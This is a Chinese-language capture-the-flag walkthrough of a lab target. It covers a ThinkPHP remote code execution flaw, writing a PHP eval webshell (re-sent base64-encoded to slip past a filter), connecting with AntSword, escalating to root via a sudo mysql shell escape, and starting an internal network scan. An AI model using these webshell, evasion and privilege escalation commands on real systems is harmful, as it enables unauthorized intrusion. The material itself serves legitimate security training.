第一个flag

用fscan扫一下发现是thinkphp的rce

image-20250124203704494

访问一下网址

image-20250124204059960

扫目录

image-20250124204131189

访问出来还是index.php

直接看漏洞浮现就可以

image-20250124204550931

抓包上传

image-20250124205041006

id可以看到当前的用户信息,然后我们用pwd看一下当前目录

image-20250124205417353

放蚁剑打好一点,往里面写个一句话

1
echo "<?php @eval($_POST['cmd']);?>" > /var/www/html

然后ls看一下木马是否成功写入

image-20250124205453216

看到写入了,用蚁剑连一下

但是没连上,是被吃了吗???

穿个phpifo的php文件试一下

1
echo "<?php phpinfo();?>" > /var/www/html/test2.php

然后访问test2.php是可以出来的

image-20250124210100299

应该是有什么被过滤了,我们用base64编码传进去试一下

1
echo "PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=" | base64 -d > /var/www/html/1.php

然后ls可以看到传进去了

image-20250124210434966

用蚁剑终于可以连上了

image-20250124210510943

找不到flag,可能在root里,试试提权。我们可以用插件,然后添加用户

image-20250124211559048

然后终端输入sudo -l

image-20250124211830447

说明我们可以通过sudo高权限运行mysql

mysql 8.0以上有system(\!)可以执行系统命令。

image-20250124212106487

1
sudo mysql -e '\! /bin/sh'

其中-e表示执行系统命令,感叹号!表示开始执行系统命令,由于在bash语句中的感叹号!表示访问历史记录,因此要对感叹号!使用反斜杠\进行转义。

然后我们顺着cat就能拿到第一个flag了

第二个flag

通过ip -a去查看网段

image-20250124212600129

可以看到是172.22.1.15/16,拿fscan扫一下(注意是拿靶机的服务器)

image-20250124213454997

我们fscan的结果会存到一个result.txt中